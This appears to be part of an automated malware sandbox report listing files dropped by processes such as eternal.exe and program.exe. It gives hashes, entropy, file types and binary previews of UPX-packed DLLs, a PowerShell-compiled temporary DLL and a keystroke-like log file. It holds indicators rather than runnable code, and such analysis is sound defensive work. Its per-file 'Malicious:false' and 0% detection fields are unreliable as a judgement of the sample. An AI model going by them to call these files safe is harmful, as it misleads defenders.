                                                                                                                                                                                                                                SHA-256:42390336EA2091A1745F571A85F00463F595D46B7A49CCDC9255845F621007CE
                                                                                                                                                                                                                                SHA-512:216DFA92DB0D6FC445F6D5F2A85378288F850DDC6F11D3ADE84B229DA6222AC516E19754C2A6274FB3BF4342A968789A66D6C82DF10FA7E7D8ABB50DA55B872F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K.9g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                                                                                                Category:modified
Size (bytes):1152
Entropy (8bit):5.4935664959751636
Encrypted:false
SSDEEP:24:K6FdId3ka6KOkqeFkbNJ/EveKax5DqBVKVrdFAMBJTH:vFdkka6NkqeFkbNJ/EveK2DcVKdBJj
MD5:5121C4BB1FD5ED7E7875006E4D61A926
SHA1:298497A71D3767787562578489E405328059728E
SHA-256:6FFF6833FA9D2A77F1B7E204BEAAB18A2674E78B0F4E3A0CFC9F201CA1F96FC8
SHA-512:5EF055EC6A860612D3AE8000118DC265F48AC2F4DEEF3E9735DEB50FE7F290DAFD0F9AEAFDDF706F9ED3712B87838BC76494DBF1DAA61FC9717FE59DF109E095
Malicious:false
Reputation:unknown
Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lo
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.096695479751756
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryntak7Ynqq6iPN5Dlq5J:+RI+ycuZhNltakS6iPNnqX
MD5:2F6FD1E6FB535F61757E8738FF2E26F1
SHA1:C869366C1FF39786CC6ACB090EB492C5F93B99BF
SHA-256:2FA62FE1E99AB7635E2B5F3ADF48EB849AB667B56B2238B4DA8A77B49830DCFF
SHA-512:DA8AA7F7756DAF9CA93CAD25DF120AF93533E4BECA6DF189DEB0FF2399273DEA2125D130942C7B237EC98A8AAC24CD1D682FE14ACBFB5F5834F48494C9DF8EB4
Malicious:false
Reputation:unknown
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.p.y.i.a.z.z.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.p.y.i.a.z.z.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Users\user\AppData\Roaming\eternal.exe
File Type:Generic INItialization configuration [WIN]
Category:dropped
Size (bytes):183
Entropy (8bit):4.663293397063965
Encrypted:false
SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovLvAFkjDCHyg4EaKC5Suf1XieAzT2cW8g/FsrTk:EFYJKDoWr5FYJKDoMFkPCHhJaZ5SudXd
MD5:0C7CA14AA339FD4004DFF23D71C4B9F1
SHA1:66209C445354464ACF89E5CAE83ED08F3C5254D4
SHA-256:66D65553E5CCBCCC9FA20D7B373DD35CA234875B6E2CC2171254006BA9B4DA96
SHA-512:39C068DA0BBB45CBDE241C56F97E15AF8DE798BB7BD8F2D7BA05EB0EC9A70AAE6D30D0B16F2AB12693F4F3F916F1309B1F7C976D3280A501EB5BFFF69AF97BC8
Malicious:false
Reputation:unknown
Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r....### C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe ###..[WIN]r....### explorer ###..[WIN]r
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Sun Nov 17 11:45:15 2024, 1st section name ".debug$S"
Category:dropped
Size (bytes):1376
Entropy (8bit):4.132412164356126
Encrypted:false
SSDEEP:24:HeO9wrqpHLwKeFGkNwI+ycuZhNltakS6iPNnqSQEgd:YqpcKeFRm1ullta36uqSZ0
MD5:3F6657CD0AB612284E292511E5090BED
SHA1:87C5DEAD367AB063FA400AFF0826BA1645F9075C
SHA-256:36014D28F930A4969F2E94475D3E45793C550C205F382B6C9DAA7F2E6C5CB30E
SHA-512:381FBB1492972051A7F0D8ADB7BA45A19E8FC26EB386F92B430C2C5D3D9C683AE9DD1CE50DBD5DD7DA364C7049734B72A89DD37312060A0B47539C1A9F4885D6
Malicious:false
Reputation:unknown
Preview:L...K.9g.............debug$S........|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........T....c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP.............../o...S_au~.8..&...........5.......C:\Users\user\AppData\Local\Temp\RES2A5B.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.p.y.i.a.z.z.o...d.l.l.....(.....L.e.
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):120400
Entropy (8bit):6.6017475353076716
Encrypted:false
SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:862F820C3251E4CA6FC0AC00E4092239
SHA1:EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):49424
Entropy (8bit):7.815740675307968
Encrypted:false
SSDEEP:768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
MD5:58FC4C56F7F400DE210E98CCB8FDC4B2
SHA1:12CB7EC39F3AF0947000295F4B50CBD6E7436554
SHA-256:DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
SHA-512:AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):64272
Entropy (8bit):7.834005148796091
Encrypted:false
SSDEEP:1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
MD5:79879C679A12FAC03F472463BB8CEFF7
SHA1:B530763123BD2C537313E5E41477B0ADC0DF3099
SHA-256:8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
SHA-512:CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):120080
Entropy (8bit):7.901857200989369
Encrypted:false
SSDEEP:3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
MD5:21D27C95493C701DFF0206FF5F03941D
SHA1:F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
SHA-256:38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
SHA-512:A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):36112
                                                                                                                                                                                                                                Entropy (8bit):7.6548425105220375
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
                                                                                                                                                                                                                                MD5:D6F123C4453230743ADCC06211236BC0
                                                                                                                                                                                                                                SHA1:9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
                                                                                                                                                                                                                                SHA-256:7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
                                                                                                                                                                                                                                SHA-512:F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):88336
                                                                                                                                                                                                                                Entropy (8bit):7.9108932581373015
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
                                                                                                                                                                                                                                MD5:055EB9D91C42BB228A72BF5B7B77C0C8
                                                                                                                                                                                                                                SHA1:5659B4A819455CF024755A493DB0952E1979A9CF
                                                                                                                                                                                                                                SHA-256:DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
                                                                                                                                                                                                                                SHA-512:C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):27408
                                                                                                                                                                                                                                Entropy (8bit):7.449801379195215
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
                                                                                                                                                                                                                                MD5:513DCE65C09B3ABC516687F99A6971D8
                                                                                                                                                                                                                                SHA1:8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
                                                                                                                                                                                                                                SHA-256:D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
                                                                                                                                                                                                                                SHA-512:621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):45328
                                                                                                                                                                                                                                Entropy (8bit):7.729647917060796
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
                                                                                                                                                                                                                                MD5:14392D71DFE6D6BDC3EBCDBDE3C4049C
                                                                                                                                                                                                                                SHA1:622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
                                                                                                                                                                                                                                SHA-256:A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
                                                                                                                                                                                                                                SHA-512:0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60176
                                                                                                                                                                                                                                Entropy (8bit):7.847943448203495
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
                                                                                                                                                                                                                                MD5:8CD40257514A16060D5D882788855B55
                                                                                                                                                                                                                                SHA1:1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
                                                                                                                                                                                                                                SHA-256:7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
                                                                                                                                                                                                                                SHA-512:A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):68368
Entropy (8bit):7.86108869046165
Encrypted:false
SSDEEP:1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
MD5:7EF27CD65635DFBA6076771B46C1B99F
SHA1:14CB35CE2898ED4E871703E3B882A057242C5D05
SHA-256:6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
SHA-512:AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1394456
Entropy (8bit):5.531698507573688
Encrypted:false
SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:A9CBD0455B46C7D14194D1F18CA8719E
SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):113874
Entropy (8bit):7.73370490411063
Encrypted:false
SSDEEP:1536:492Wl7KxFTXlh+5dF3e2A8QN8A0EuqUkrVrrib26s/CGGzuskhz2WawfooIMR2jV:AKxJi5dFO2A8BS9ss/CbzTUKWSxqcf
MD5:7FC09043BE2028C6D91488E29ACDC4D0
SHA1:B3C8537899831477155252A89F5E8373433C0130
SHA-256:5AF489AF3E1F305D479D57D6EBBD9508E0BA6A537B9814A637D4303CDE4A70D4
SHA-512:6442D8EE116FE4ECAEAA807C861A98AF1D84D0498D646867AA221B2DAF157D8F0CDB9FA3114666BCE2BD37B01660561BAC00798835BDF51846E6C9C4C141C820
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1630488
Entropy (8bit):7.952879310777133
Encrypted:false
SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:8377FE5949527DD7BE7B827CB1FFD324
SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):29968
Entropy (8bit):7.677818197322094
Encrypted:false
SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:08B000C3D990BC018FCB91A1E175E06E
SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):227096
Entropy (8bit):7.928768674438361
Encrypted:false
SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Roaming\program.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1850640
Entropy (8bit):7.994061638516346
Encrypted:true
SSDEEP:49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
MD5:6EF5D2F77064DF6F2F47AF7EE4D44F0F
SHA1:0003946454B107874AA31839D41EDCDA1C77B0AF
SHA-256:AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
SHA-512:1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).@........J..3e...J..................................0f...........`.........................................H_e......Ye......Pe......0]..............'f.4............................?e.(...@@e.@...........................................UPX0......J.............................UPX1.....@....J..2..................@....rsrc........Pe......6..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):630736
                                                                                                                                                                                                                                Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
